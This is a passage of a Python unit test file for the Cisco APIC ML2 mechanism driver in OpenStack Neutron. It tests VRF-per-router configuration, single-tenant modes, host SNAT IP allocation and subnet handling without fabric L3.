service_plugins=service_plugins)
self.expected_bound_driver = 'openvswitch'
class TestCiscoApicMechDriverSingleVRF(TestCiscoApicMechDriver):
def setUp(self):
self.override_conf('per_tenant_context', False,
'ml2_cisco_apic')
super(TestCiscoApicMechDriverSingleVRF, self).setUp()
class TestCiscoApicMechDriverSingleTenant(TestCiscoApicMechDriver):
def setUp(self):
self.override_conf('single_tenant_mode', True,
'ml2_cisco_apic')
super(TestCiscoApicMechDriverSingleTenant, self).setUp()
class TestCiscoApicMechDriverSingleTenantWithName(TestCiscoApicMechDriver):
def setUp(self):
self.override_conf('single_tenant_mode', True,
'ml2_cisco_apic')
self.override_conf('single_tenant_name', "singleTenantName",
'ml2_cisco_apic')
super(TestCiscoApicMechDriverSingleTenantWithName, self).setUp()
class TestCiscoApicMechDriverSingleTenantSingleVRF(
TestCiscoApicMechDriverSingleVRF):
def setUp(self):
self.override_conf('single_tenant_mode', True,
'ml2_cisco_apic')
super(TestCiscoApicMechDriverSingleTenantSingleVRF, self).setUp()
class TestCiscoApicMechDriverSingleTenantWithNameSingleVRF(
TestCiscoApicMechDriverSingleVRF):
def setUp(self):
self.override_conf('single_tenant_mode', True,
'ml2_cisco_apic')
self.override_conf('single_tenant_name', "singleTenantName",
'ml2_cisco_apic')
super(TestCiscoApicMechDriverSingleTenantWithNameSingleVRF,
self).setUp()
class VrfPerRouterBase(object):
def doSetup(self):
self.override_conf('vrf_per_router_tenants',
[mocked.APIC_TENANT, ' ^coke* ', '', ' ', '['],
'ml2_cisco_apic')
def test_config_option(self):
self.assertEqual([mocked.APIC_TENANT, '^coke*'],
self.driver.vrf_per_router_tenants)
def test_create_delete_router_vrf(self):
routers = [{'id': 'r1', 'tenant_id': 'coke_1_tenant'},
{'id': 'r2', 'tenant_id': 'another_coke_1_tenant'},
{'id': 'r3', 'tenant_id': 'coke_1_tenant',
'apic:use_routing_context': 'r1'}]
for rtr in routers:
is_vrf_per_router = (rtr['tenant_id'] == 'coke_1_tenant')
mgr = self.driver.apic_manager
vrf_tenant = self._tenant(neutron_tenant=rtr['tenant_id'])
vrf_name = self._routed_network_vrf_name(router=rtr['id'],
tenant=rtr['tenant_id'])
mgr.ensure_context_enforced.reset_mock()
self.driver.create_vrf_per_router(rtr, 'txn')
if is_vrf_per_router and not rtr.get(USE_ROUTING_CONTEXT):
mgr.ensure_context_enforced.assert_called_once_with(
owner=vrf_tenant, ctx_id=vrf_name, transaction='txn')
else:
mgr.ensure_context_enforced.assert_not_called()
mgr.ensure_context_deleted.reset_mock()
self.driver.delete_vrf_per_router(rtr, 'txn')
if is_vrf_per_router and not rtr.get(USE_ROUTING_CONTEXT):
mgr.ensure_context_deleted.assert_called_once_with(
owner=vrf_tenant, ctx_id=vrf_name, transaction='txn')
else:
mgr.ensure_context_deleted.assert_not_called()
def test_multiple_routers_precommit_exception(self):
intf_ports = []
def get_ports(ctx, filters):
return [p.current for p in intf_ports]
net_ctx = self._get_network_context(mocked.APIC_TENANT,
mocked.APIC_NETWORK, TEST_SEGMENT1)
for x in range(0, 3):
rtr = '%s-%d' % (mocked.APIC_ROUTER, x / 2)
port = self._get_port_context(mocked.APIC_TENANT,
mocked.APIC_NETWORK,
'intf', net_ctx, HOST_ID1,
router_owner=rtr,
interface=True)
port.current['id'] += x
port._plugin.get_ports = get_ports
intf_ports.append(port)
if x < 2:
# no exception expected
self.driver.create_port_precommit(port)
self.driver.update_port_precommit(port)
else:
self.assertRaises(md.OnlyOneRouterPermittedIfVrfPerRouter,
self.driver.create_port_precommit, port)
self.assertRaises(md.OnlyOneRouterPermittedIfVrfPerRouter,
self.driver.update_port_precommit, port)
def test_use_routing_context_routers_precommit(self):
intf_ports = []
def get_ports(ctx, filters):
return [p.current for p in intf_ports]
self.driver._l3_plugin.get_routers = mock.Mock(return_value=[
{'id': mocked.APIC_ROUTER + '-0', 'tenant_id': mocked.APIC_TENANT},
{'id': mocked.APIC_ROUTER + '-1', 'tenant_id': mocked.APIC_TENANT,
'apic:use_routing_context': mocked.APIC_ROUTER + '-0'}])
net_ctx = self._get_network_context(mocked.APIC_TENANT,
mocked.APIC_NETWORK, TEST_SEGMENT1)
for x in range(0, 3):
rtr = '%s-%d' % (mocked.APIC_ROUTER, x / 2)
self.driver._l3_plugin.get_router = mock.Mock(return_value={
'id': rtr, 'tenant_id': mocked.APIC_TENANT,
'apic:use_routing_context': mocked.APIC_ROUTER + '-0'})
port = self._get_port_context(mocked.APIC_TENANT,
mocked.APIC_NETWORK,
'intf', net_ctx, HOST_ID1,
router_owner=rtr,
interface=True)
port.current['id'] += x
port._plugin.get_ports = get_ports
intf_ports.append(port)
# no exception expected
self.driver.create_port_precommit(port)
self.driver.update_port_precommit(port)
def test_multiple_intf_ports_delete(self):
intf_ports = []
def get_ports(ctx, filters):
return [p.current for p in intf_ports]
net_ctx = self._get_network_context(mocked.APIC_TENANT,
mocked.APIC_NETWORK, TEST_SEGMENT1)
mgr = self.driver.apic_manager
for x in range(0, 3):
port = self._get_port_context(mocked.APIC_TENANT,
mocked.APIC_NETWORK,
'intf', net_ctx, HOST_ID1,
router_owner=mocked.APIC_ROUTER,
interface=True)
port.current['id'] += x
port._plugin.get_ports = get_ports
intf_ports.append(port)
port._plugin.get_subnets = mock.Mock(
return_value=[{'tenant_id': mocked.APIC_TENANT,
'id': 'some_id',
'cidr': '5.5.5.0/24'}])
self.driver._get_route_leak_networks = mock.Mock(return_value=([]))
while intf_ports:
port = intf_ports[0]
del intf_ports[0]
self.driver.delete_port_postcommit(port)
if intf_ports:
mgr.set_context_for_bd.assert_not_called()
else:
mgr.set_context_for_bd.assert_called_once_with(
self._tenant(), self._scoped_name(mocked.APIC_NETWORK),
self._network_vrf_name(), transaction=mock.ANY)
class TestCiscoApicMechDriverVrfPerRouter(TestCiscoApicMechDriver,
VrfPerRouterBase):
def setUp(self):
self.doSetup()
super(TestCiscoApicMechDriverVrfPerRouter, self).setUp()
class TestCiscoApicMechDriverVrfPerRouterSingleTenant(
TestCiscoApicMechDriverSingleTenant, VrfPerRouterBase):
def setUp(self):
self.doSetup()
super(TestCiscoApicMechDriverVrfPerRouterSingleTenant, self).setUp()
class TestCiscoApicMechDriverHostSNAT(ApicML2IntegratedTestBase):
def setUp(self):
super(TestCiscoApicMechDriverHostSNAT, self).setUp()
mocked.ControllerMixin.set_up_mocks(self)
mocked.ConfigMixin.set_up_mocks(self)
self.mock_apic_manager_login_responses()
self.driver = md.APICMechanismDriver()
self.driver.synchronizer = None
self.synchronizer = mock.Mock()
md.APICMechanismDriver.get_base_synchronizer = mock.Mock(
return_value=self.synchronizer)
self.driver.initialize()
self.driver.apic_manager = mock.Mock(
name_mapper=mock.Mock(), ext_net_dict=self.external_network_dict)
self.driver.apic_manager.apic.transaction = self.fake_transaction
self.agent = {'configurations': {
'opflex_networks': None,
'bridge_mappings': {'physnet1': 'br-eth1'}}}
self.actual_core_plugin = manager.NeutronManager.get_plugin()
self.driver._l3_plugin = mock.Mock()
def get_resource(context, resource_id):
return {'id': resource_id, 'tenant_id': mocked.APIC_TENANT}
self.driver._l3_plugin.get_router = get_resource
def tearDown(self):
super(TestCiscoApicMechDriverHostSNAT, self).tearDown()
def _get_network_context(self, plugin, tenant_id, net_id, seg_id=None,
seg_type='vlan', external=False, shared=False):
ctx = context.get_admin_context()
network = {'id': net_id,
'name': mocked.APIC_NETWORK_HOST_SNAT + '-name',
'tenant_id': tenant_id,
'provider:segmentation_id': seg_id,
'provider:network_type': seg_type,
'shared': shared}
if external:
network['router:external'] = True
return driver_context.NetworkContext(plugin, ctx, network)
def test_1_port_created_for_host(self):
# This test case is more of a functional test and should be revisited.
ctx = context.get_admin_context()
agent = {'host': 'h1'}
agent.update(AGENT_CONF)
self.actual_core_plugin.create_or_update_agent(ctx, agent)
args = {'network': {'name': mocked.APIC_NETWORK_HOST_SNAT + '-name',
'admin_state_up': True, 'shared': True,
'status': n_constants.NET_STATUS_ACTIVE,
'tenant_id': 'onetenant',
'router:external': True}}
db_net = self.driver.db_plugin.create_network(ctx, args)
net_ctx = self._get_network_context(self.actual_core_plugin,
ctx.tenant_id,
db_net['id'],
TEST_SEGMENT1, external=True)
self.driver.create_network_postcommit(net_ctx)
snat_networks = self.driver.db_plugin.get_networks(
ctx, filters={'name': [self.driver._get_snat_db_network_name(
db_net)]})
snat_network_id = snat_networks[0]['id']
net = self.create_network(
tenant_id='onetenant', expected_res_status=201, shared=True,
is_admin_context=True)['network']
sub = self.create_subnet(
network_id=net['id'], cidr='10.0.0.0/24',
ip_version=4, is_admin_context=True)
host_arg = {'binding:host_id': 'h2'}
with self.port(subnet=sub, tenant_id='anothertenant',
device_owner='compute:', device_id='someid',
arg_list=(portbindings.HOST_ID,), **host_arg) as p1:
p1 = p1['port']
self.assertEqual(net['id'], p1['network_id'])
# We need the db_plugin to get invoked from the code being
# tested. However, this was earlier mocked out in the setup,
# hence we reset it here.
self.driver.db_plugin._device_to_port_id = (
self.actual_core_plugin._device_to_port_id)
self.driver.db_plugin.get_bound_port_context = (
self.actual_core_plugin.get_bound_port_context)
self.driver.db_plugin.get_agents = (
self.actual_core_plugin.get_agents)
self.driver.db_plugin.create_or_update_agent = (
self.actual_core_plugin.create_or_update_agent)
self.driver._is_nat_enabled_on_ext_net = mock.Mock()
self.driver._is_connected_to_ext_net = mock.Mock()
self.driver.agent_type = 'Open vSwitch agent'
details = self.driver.get_gbp_details(
ctx, device='tap%s' % p1['id'], host='h1')
host_snat_ips = details['host_snat_ips']
self.assertEqual(1, len(host_snat_ips))
self.assertEqual(db_net['name'],
host_snat_ips[0]['external_segment_name'])
hcidr = self.driver.apic_manager.ext_net_dict[
db_net['name']]['host_pool_cidr']
self._check_ip_in_cidr(host_snat_ips[0]['host_snat_ip'], hcidr)
self.assertEqual('192.168.0.1',
host_snat_ips[0]['gateway_ip'])
self.assertEqual(
netaddr.IPNetwork(mocked.HOST_POOL_CIDR).prefixlen,
host_snat_ips[0]['prefixlen'])
snat_ports = self.driver.db_plugin.get_ports(
ctx, filters={'name': [acst.HOST_SNAT_POOL_PORT],
'network_id': [snat_network_id],
'device_id': ['h1']})
self.assertEqual(1, len(snat_ports))
# Simulate a second event on the same host for the same external
# network to check if the earlier allocated SNAT IP is returned
with self.port(subnet=sub, tenant_id='anothertenant',
device_owner='compute:', device_id='someid',
arg_list=(portbindings.HOST_ID,), **host_arg) as p2:
p2 = p2['port']
self.assertEqual(net['id'], p2['network_id'])
details = self.driver.get_gbp_details(
ctx, device='tap%s' % p2['id'], host='h1')
host_snat_ips = details['host_snat_ips']
self.assertEqual(1, len(host_snat_ips))
self.assertEqual(db_net['name'],
host_snat_ips[0]['external_segment_name'])
self._check_ip_in_cidr(host_snat_ips[0]['host_snat_ip'], hcidr)
self.assertEqual('192.168.0.1',
host_snat_ips[0]['gateway_ip'])
self.assertEqual(
netaddr.IPNetwork(mocked.HOST_POOL_CIDR).prefixlen,
host_snat_ips[0]['prefixlen'])
snat_ports = self.driver.db_plugin.get_ports(
ctx, filters={'name': [acst.HOST_SNAT_POOL_PORT],
'network_id': [snat_network_id],
'device_id': ['h1']})
self.assertEqual(1, len(snat_ports))
# Now simulate event of a second host
host_arg = {'binding:host_id': 'h2'}
with self.port(subnet=sub, tenant_id='anothertenant',
device_owner='compute:', device_id='someid',
arg_list=(portbindings.HOST_ID,), **host_arg) as p3:
p3 = p3['port']
self.assertEqual(net['id'], p3['network_id'])
details = self.driver.get_gbp_details(
ctx, device='tap%s' % p3['id'], host='h2')
host_snat_ips = details['host_snat_ips']
self.assertEqual(1, len(host_snat_ips))
self.assertEqual(db_net['name'],
host_snat_ips[0]['external_segment_name'])
self._check_ip_in_cidr(host_snat_ips[0]['host_snat_ip'], hcidr)
self.assertEqual('192.168.0.1',
host_snat_ips[0]['gateway_ip'])
self.assertEqual(
netaddr.IPNetwork(mocked.HOST_POOL_CIDR).prefixlen,
host_snat_ips[0]['prefixlen'])
snat_ports = self.driver.db_plugin.get_ports(
ctx, filters={'name': [acst.HOST_SNAT_POOL_PORT],
'network_id': [snat_network_id],
'device_id': ['h2']})
self.assertEqual(1, len(snat_ports))
snat_ports = self.driver.db_plugin.get_ports(
ctx, filters={'name': [acst.HOST_SNAT_POOL_PORT],
'network_id': [snat_network_id]})
self.assertEqual(2, len(snat_ports))
self.driver.delete_network_postcommit(net_ctx)
snat_ports = self.driver.db_plugin.get_ports(
ctx, filters={'name': [acst.HOST_SNAT_POOL_PORT],
'network_id': [snat_network_id]})
self.assertEqual(0, len(snat_ports))
snat_networks = self.driver.db_plugin.get_networks(
ctx, filters={'name': [self.driver._get_snat_db_network_name(
db_net)]})
self.assertEqual(0, len(snat_networks))
subnets = self.driver.db_plugin.get_subnets(
ctx, filters={'name': [acst.HOST_SNAT_POOL]})
self.assertEqual(0, len(subnets))
def test_1_port_created_for_host_edge_nat(self):
# This test case is more of a functional test and should be revisited.
ctx = context.get_admin_context()
agent = {'host': 'h1'}
agent.update(AGENT_CONF)
self.actual_core_plugin.create_or_update_agent(ctx, agent)
args = {'network': {'name': mocked.APIC_NETWORK_EDGE_NAT + '-name',
'admin_state_up': True, 'shared': True,
'status': n_constants.NET_STATUS_ACTIVE,
'tenant_id': 'onetenant',
'router:external': True}}
db_net = self.driver.db_plugin.create_network(ctx, args)
net_ctx = self._get_network_context(self.actual_core_plugin,
ctx.tenant_id,
db_net['id'],
TEST_SEGMENT1, external=True)
self.driver.create_network_postcommit(net_ctx)
snat_networks = self.driver.db_plugin.get_networks(
ctx, filters={'name': [self.driver._get_snat_db_network_name(
db_net)]})
snat_network_id = snat_networks[0]['id']
net = self.create_network(
tenant_id='onetenant', expected_res_status=201, shared=True,
is_admin_context=True)['network']
sub = self.create_subnet(
network_id=net['id'], cidr='10.0.0.0/24',
ip_version=4, is_admin_context=True)
host_arg = {'binding:host_id': 'h2'}
with self.port(subnet=sub, tenant_id='anothertenant',
device_owner='compute:', device_id='someid',
arg_list=(portbindings.HOST_ID,), **host_arg) as p1:
p1 = p1['port']
self.assertEqual(net['id'], p1['network_id'])
# We need the db_plugin to get invoked from the code being
# tested. However, this was earlier mocked out in the setup,
# hence we reset it here.
self.driver.db_plugin._device_to_port_id = (
self.actual_core_plugin._device_to_port_id)
self.driver.db_plugin.get_bound_port_context = (
self.actual_core_plugin.get_bound_port_context)
self.driver.db_plugin.get_agents = (
self.actual_core_plugin.get_agents)
self.driver.db_plugin.create_or_update_agent = (
self.actual_core_plugin.create_or_update_agent)
self.driver._is_nat_enabled_on_ext_net = mock.Mock()
self.driver._is_connected_to_ext_net = mock.Mock()
self.driver.agent_type = 'Open vSwitch agent'
details = self.driver.get_gbp_details(
ctx, device='tap%s' % p1['id'], host='h1')
host_snat_ips = details['host_snat_ips']
self.assertEqual(0, len(host_snat_ips))
snat_ports = self.driver.db_plugin.get_ports(
ctx, filters={'name': [acst.HOST_SNAT_POOL_PORT],
'network_id': [snat_network_id],
'device_id': ['h1']})
self.assertEqual(0, len(snat_ports))
ipms = details['ip_mapping']
self.assertEqual(0, len(ipms))
def _create_snat_network(self, ctx, tenant_id):
args = {'network': {'name': mocked.APIC_NETWORK_HOST_SNAT + '-name',
'admin_state_up': True, 'shared': True,
'status': n_constants.NET_STATUS_ACTIVE,
'tenant_id': tenant_id,
'router:external': True}}
db_net = self.driver.db_plugin.create_network(ctx, args)
net_ctx = self._get_network_context(self.actual_core_plugin,
ctx.tenant_id,
db_net['id'],
TEST_SEGMENT1, external=True)
self.driver.create_network_postcommit(net_ctx)
return db_net, net_ctx
def _snat_mock_setup(self, tenant_id):
self.driver._is_edge_nat = mock.Mock(return_value=True)
self.driver._is_pre_existing = mock.Mock(return_value=False)
self.driver.apic_manager.apic.fvTenant.name = mock.Mock(
return_value=tenant_id)
# We need the db_plugin to get invoked from the code being
# tested. However, this was earlier mocked out in the setup,
# hence we reset it here.
self.driver.db_plugin._device_to_port_id = (
self.actual_core_plugin._device_to_port_id)
self.driver.db_plugin.get_bound_port_context = (
self.actual_core_plugin.get_bound_port_context)
self.driver.db_plugin.get_agents = (
self.actual_core_plugin.get_agents)
self.driver.db_plugin.create_or_update_agent = (
self.actual_core_plugin.create_or_update_agent)
self.driver._is_nat_enabled_on_ext_net = mock.Mock()
self.driver._is_connected_to_ext_net = mock.Mock()
self.driver.agent_type = 'Open vSwitch agent'
def test_1_snat_ip_created_for_vrf_edge_nat(self):
# This test case is more of a functional test and should be revisited.
TEST_TENANT_ID1 = 'onetenant'
TEST_TENANT_ID2 = 'anothertenant'
self._snat_mock_setup(TEST_TENANT_ID1)
ctx = context.get_admin_context()
agent = {'host': 'h1'}
agent.update(AGENT_CONF)
self.actual_core_plugin.create_or_update_agent(ctx, agent)
db_net, net_ctx = self._create_snat_network(ctx, TEST_TENANT_ID1)
snat_networks = self.driver.db_plugin.get_networks(
ctx, filters={'name': [self.driver._get_snat_db_network_name(
db_net)]})
snat_network_id = snat_networks[0]['id']
net = self.create_network(
tenant_id=TEST_TENANT_ID1, expected_res_status=201, shared=True,
is_admin_context=True)['network']
sub = self.create_subnet(
network_id=net['id'], cidr='10.0.0.0/24',
ip_version=4, is_admin_context=True)
host_arg = {'binding:host_id': 'h2'}
hcidr = self.driver.apic_manager.ext_net_dict[
db_net['name']]['host_pool_cidr']
# Create port with a different tenant
with self.port(subnet=sub, tenant_id=TEST_TENANT_ID2,
device_owner='compute:', device_id='someid',
arg_list=(portbindings.HOST_ID,), **host_arg) as p1:
port1 = p1['port']
self.assertEqual(net['id'], port1['network_id'])
details = self.driver.get_snat_ip_for_vrf(ctx,
TEST_TENANT_ID1, db_net)
# Verify that the port has an SNAT IP, which is
# allocated in the SNAT network tenant ID
self.assertEqual(db_net['name'],
details['external_segment_name'])
self._check_ip_in_cidr(details['host_snat_ip'], hcidr)
self.assertEqual('192.168.0.1', details['gateway_ip'])
self.assertEqual(
netaddr.IPNetwork(mocked.HOST_POOL_CIDR).prefixlen,
details['prefixlen'])
snat_ports = self.driver.db_plugin.get_ports(
ctx, filters={'name': [acst.HOST_SNAT_POOL_PORT],
'network_id': [snat_network_id],
'device_id': [TEST_TENANT_ID1]})
self.assertEqual(1, len(snat_ports))
# Simulate a second event on the same host with the same VRF for
# the same external network to check if the earlier allocated SNAT
# IP is returned
with self.port(subnet=sub, tenant_id=TEST_TENANT_ID2,
device_owner='compute:', device_id='someid',
arg_list=(portbindings.HOST_ID,), **host_arg) as p2:
port2 = p2['port']
self.assertEqual(net['id'], port2['network_id'])
details = self.driver.get_snat_ip_for_vrf(ctx,
TEST_TENANT_ID1,
db_net)
self.assertEqual(db_net['name'],
details['external_segment_name'])
self._check_ip_in_cidr(details['host_snat_ip'], hcidr)
self.assertEqual('192.168.0.1', details['gateway_ip'])
self.assertEqual(
netaddr.IPNetwork(mocked.HOST_POOL_CIDR).prefixlen,
details['prefixlen'])
snat_ports = self.driver.db_plugin.get_ports(
ctx, filters={'name': [acst.HOST_SNAT_POOL_PORT],
'network_id': [snat_network_id],
'device_id': [TEST_TENANT_ID1]})
self.assertEqual(1, len(snat_ports))
# Now simulate event of a second host with same VRF
host_arg = {'binding:host_id': 'h2'}
with self.port(subnet=sub, tenant_id=TEST_TENANT_ID2,
device_owner='compute:', device_id='someid',
arg_list=(portbindings.HOST_ID,), **host_arg) as p3:
port3 = p3['port']
self.assertEqual(net['id'], port3['network_id'])
details = self.driver.get_snat_ip_for_vrf(ctx,
TEST_TENANT_ID1,
db_net)
self.assertEqual(db_net['name'],
details['external_segment_name'])
self._check_ip_in_cidr(details['host_snat_ip'], hcidr)
self.assertEqual('192.168.0.1',
details['gateway_ip'])
self.assertEqual(
netaddr.IPNetwork(mocked.HOST_POOL_CIDR).prefixlen,
details['prefixlen'])
snat_ports = self.driver.db_plugin.get_ports(
ctx, filters={'name': [acst.HOST_SNAT_POOL_PORT],
'network_id': [snat_network_id],
'device_id': [TEST_TENANT_ID1]})
self.assertEqual(1, len(snat_ports))
snat_ports = self.driver.db_plugin.get_ports(
ctx, filters={'name': [acst.HOST_SNAT_POOL_PORT],
'network_id': [snat_network_id]})
self.assertEqual(1, len(snat_ports))
self.driver.delete_network_postcommit(net_ctx)
snat_ports = self.driver.db_plugin.get_ports(
ctx, filters={'name': [acst.HOST_SNAT_POOL_PORT],
'network_id': [snat_network_id]})
self.assertEqual(0, len(snat_ports))
snat_networks = self.driver.db_plugin.get_networks(
ctx, filters={'name': [self.driver._get_snat_db_network_name(
db_net)]})
self.assertEqual(0, len(snat_networks))
subnets = self.driver.db_plugin.get_subnets(
ctx, filters={'name': [acst.HOST_SNAT_POOL]})
self.assertEqual(0, len(subnets))
def test_2_snat_ips_created_for_2_vrfs_edge_nat(self):
# This test case is more of a functional test and should be revisited.
TEST_TENANT_ID1 = 'onetenant'
TEST_TENANT_ID2 = 'anothertenant'
self._snat_mock_setup(TEST_TENANT_ID1)
ctx = context.get_admin_context()
agent = {'host': 'h1'}
agent.update(AGENT_CONF)
self.actual_core_plugin.create_or_update_agent(ctx, agent)
db_net, net_ctx = self._create_snat_network(ctx, TEST_TENANT_ID1)
snat_networks = self.driver.db_plugin.get_networks(
ctx, filters={'name': [self.driver._get_snat_db_network_name(
db_net)]})
snat_network_id = snat_networks[0]['id']
net = self.create_network(
tenant_id=TEST_TENANT_ID1, expected_res_status=201, shared=True,
is_admin_context=True)['network']
sub = self.create_subnet(
network_id=net['id'], cidr='10.0.0.0/24',
ip_version=4, is_admin_context=True)
host_arg = {'binding:host_id': 'h2'}
# Create port with a different tenant
with self.port(subnet=sub, tenant_id=TEST_TENANT_ID2,
device_owner='compute:', device_id='someid',
arg_list=(portbindings.HOST_ID,), **host_arg) as p1:
port1 = p1['port']
self.assertEqual(net['id'], port1['network_id'])
self.driver.apic_manager.apic.fvTenant.name = mock.Mock(
return_value=TEST_TENANT_ID2)
details = self.driver.get_snat_ip_for_vrf(ctx,
TEST_TENANT_ID2, db_net)
# Verify that the port has an SNAT IP, which is
# allocated in the SNAT network tenant ID
self.assertEqual(db_net['name'],
details['external_segment_name'])
hcidr = self.driver.apic_manager.ext_net_dict[
db_net['name']]['host_pool_cidr']
self._check_ip_in_cidr(
details['host_snat_ip'], hcidr)
self.assertEqual('192.168.0.1',
details['gateway_ip'])
self.assertEqual(
netaddr.IPNetwork(mocked.HOST_POOL_CIDR).prefixlen,
details['prefixlen'])
snat_ports = self.driver.db_plugin.get_ports(
ctx, filters={'name': [acst.HOST_SNAT_POOL_PORT],
'network_id': [snat_network_id],
'device_id': [TEST_TENANT_ID2]})
self.assertEqual(1, len(snat_ports))
# Simulate a second event on the same host with the a different VRF
# for the same external network to check if the earlier allocated
# SNAT IP is returned
with self.port(subnet=sub, tenant_id=TEST_TENANT_ID1,
device_owner='compute:', device_id='someid',
arg_list=(portbindings.HOST_ID,), **host_arg) as p2:
port2 = p2['port']
self.assertEqual(net['id'], port2['network_id'])
self.driver.apic_manager.apic.fvTenant.name = mock.Mock(
return_value=TEST_TENANT_ID1)
details = self.driver.get_snat_ip_for_vrf(ctx,
TEST_TENANT_ID1,
db_net)
self.assertEqual(db_net['name'],
details['external_segment_name'])
self._check_ip_in_cidr(
details['host_snat_ip'], hcidr)
self.assertEqual('192.168.0.1',
details['gateway_ip'])
self.assertEqual(
netaddr.IPNetwork(mocked.HOST_POOL_CIDR).prefixlen,
details['prefixlen'])
snat_ports = self.driver.db_plugin.get_ports(
ctx, filters={'name': [acst.HOST_SNAT_POOL_PORT],
'network_id': [snat_network_id],
'device_id': [TEST_TENANT_ID1]})
self.assertEqual(1, len(snat_ports))
# Now simulate event of a second host with same VRF
host_arg = {'binding:host_id': 'h2'}
with self.port(subnet=sub, tenant_id=TEST_TENANT_ID2,
device_owner='compute:', device_id='someid',
arg_list=(portbindings.HOST_ID,), **host_arg) as p3:
port3 = p3['port']
self.assertEqual(net['id'], port3['network_id'])
self.driver.apic_manager.apic.fvTenant.name = mock.Mock(
return_value=TEST_TENANT_ID2)
details = self.driver.get_snat_ip_for_vrf(ctx,
TEST_TENANT_ID2,
db_net)
self.assertEqual(db_net['name'],
details['external_segment_name'])
self._check_ip_in_cidr(
details['host_snat_ip'], hcidr)
self.assertEqual('192.168.0.1',
details['gateway_ip'])
self.assertEqual(
netaddr.IPNetwork(mocked.HOST_POOL_CIDR).prefixlen,
details['prefixlen'])
snat_ports = self.driver.db_plugin.get_ports(
ctx, filters={'name': [acst.HOST_SNAT_POOL_PORT],
'network_id': [snat_network_id],
'device_id': [TEST_TENANT_ID2]})
self.assertEqual(1, len(snat_ports))
snat_ports = self.driver.db_plugin.get_ports(
ctx, filters={'name': [acst.HOST_SNAT_POOL_PORT],
'network_id': [snat_network_id]})
self.assertEqual(2, len(snat_ports))
self.driver.delete_network_postcommit(net_ctx)
snat_ports = self.driver.db_plugin.get_ports(
ctx, filters={'name': [acst.HOST_SNAT_POOL_PORT],
'network_id': [snat_network_id]})
self.assertEqual(0, len(snat_ports))
snat_networks = self.driver.db_plugin.get_networks(
ctx, filters={'name': [self.driver._get_snat_db_network_name(
db_net)]})
self.assertEqual(0, len(snat_networks))
subnets = self.driver.db_plugin.get_subnets(
ctx, filters={'name': [acst.HOST_SNAT_POOL]})
self.assertEqual(0, len(subnets))
def test_create_external_network_postcommit(self):
ctx = context.get_admin_context()
args = {'network': {'name': mocked.APIC_NETWORK_HOST_SNAT + '-name',
'admin_state_up': True, 'shared': True,
'tenant_id': 'onetenant',
'status': n_constants.NET_STATUS_ACTIVE}}
db_net = self.driver.db_plugin.create_network(ctx, args)
net_ctx = self._get_network_context(self.actual_core_plugin,
ctx.tenant_id,
db_net['id'],
TEST_SEGMENT1, external=True)
self.driver.create_network_postcommit(net_ctx)
snat_networks = self.driver.db_plugin.get_networks(
ctx,
filters={'name': [self.driver._get_snat_db_network_name(db_net)]})
snat_net_id = snat_networks[0]['id']
self.assertEqual(1, len(snat_networks))
seg = ml2_db.get_network_segments(ctx.session, snat_net_id)
self.assertEqual(1, len(seg))
subnets = self.driver.db_plugin.get_subnets(
ctx, filters={'name': [acst.HOST_SNAT_POOL]})
self.assertEqual(1, len(subnets))
self.driver.delete_network_postcommit(net_ctx)
snat_networks = self.driver.db_plugin.get_networks(
ctx,
filters={'name': [self.driver._get_snat_db_network_name(db_net)]})
self.assertEqual(0, len(snat_networks))
seg = ml2_db.get_network_segments(ctx.session, snat_net_id)
self.assertEqual(0, len(seg))
subnets = self.driver.db_plugin.get_subnets(
ctx, filters={'name': [acst.HOST_SNAT_POOL]})
self.assertEqual(0, len(subnets))
class TestCiscoApicMechDriverNoFabricL3(TestApicML2IntegratedPhysicalNode):
def setUp(self, service_plugins=None, ml2_opts=None):
# Mock out HA scheduler notifcations
# (irrelevant exceptions if it's not)
self._update_notify = mock.patch(
'neutron.db.l3_hascheduler_db._notify_l3_agent_ha_port_update')
self._update_notify.start()
# Configure reference L3 implementation, which
# disables routing and subnet configuration in the ACI fabric
super(TestCiscoApicMechDriverNoFabricL3, self).setUp(
service_plugins={
'L3_ROUTER_NAT': 'router',
'flavors_plugin_name': 'neutron.services.flavors.'
'flavors_plugin.FlavorsPlugin'})
def tearDown(self):
self._update_notify.stop()
super(TestCiscoApicMechDriverNoFabricL3, self).tearDown()
def test_create_subnet_no_l3(self):
ctx = context.get_admin_context()
tenant1 = self._tenant(neutron_tenant='onetenant')
app_prof1 = self._app_profile(neutron_tenant='onetenant')
self.mgr.ensure_bd_created_on_apic = mock.Mock()
self._register_agent('h1', agent_cfg=AGENT_CONF_OPFLEX)
# Create a network with a subnet, then add
# a port to the subnet and bind it to a host
# (e.g. as if Nova did a port binding for a VM port)
net = self.create_network(
tenant_id='onetenant', is_admin_context=True)['network']
sub = self.create_subnet(
network_id=net['id'], cidr='192.168.0.0/24',
ip_version=4, is_admin_context=True)
with self.port(subnet=sub, tenant_id='onetenant') as p1:
p1 = p1['port']
self.mgr.ensure_bd_created_on_apic.assert_called_once_with(
tenant1, mock.ANY,
ctx_owner=mock.ANY,
ctx_name=self._network_vrf_name(net_name=net['id']),
transaction='transaction', unicast_route=False)
# bind to VM-host
self._bind_port_to_host(p1['id'], 'h1')
bseg_p1, bdriver = self._get_bound_seg(p1['id'])
self.assertEqual(bseg_p1['network_type'], 'opflex')
self.assertEqual('cisco_apic_ml2', bdriver)
# We shouldn't be using a PhysDom for opflex network
# type ports -- make sure we didn't use one
self.mgr.ensure_path_created_for_port.assert_not_called()
# Create a router and add an interface from
# the subnet we created above. Make explicit call for
# port binding for the newly created router port as well.
router = self.create_router(api=self.ext_api,
tenant_id='onetenant',
is_admin_context=True)['router']
self.l3_plugin.add_router_interface(ctx,
router['id'],
{'subnet_id': sub['subnet']['id']})
self.mgr.ensure_subnet_created_on_apic.assert_not_called()
router_port = self.driver.db_plugin.get_ports(
ctx, filters={'device_id': [router['id']],
'network_id': [net['id']]})[0]
self.mgr.ensure_path_created_for_port.reset_mock()
# Bind the port to a host that's not running OpFlex.
self._bind_port_to_host(p1['id'], 'lb-app-01')
self.mgr.ensure_path_created_for_port.assert_called()
bseg_p1, bdriver = self._get_bound_seg(p1['id'])
self.assertEqual(1, len(self._query_dynamic_seg(net['id'])))
self.mgr.ensure_path_created_for_port.assert_called_once_with(
tenant1, net['id'], 'lb-app-01', bseg_p1['segmentation_id'],
bd_name=None, app_profile_name=app_prof1, transaction=mock.ANY)
self.l3_plugin.remove_router_interface(ctx,
router['id'],
{'port_id': router_port['id']})
self.delete_port(p1['id'], tenant_id=p1['tenant_id'])
self.assertEqual(0, len(self._query_dynamic_seg(net['id'])))
self.mgr.ensure_path_deleted_for_port.assert_called_once_with(
tenant1, net['id'], 'lb-app-01', app_profile_name=app_prof1)
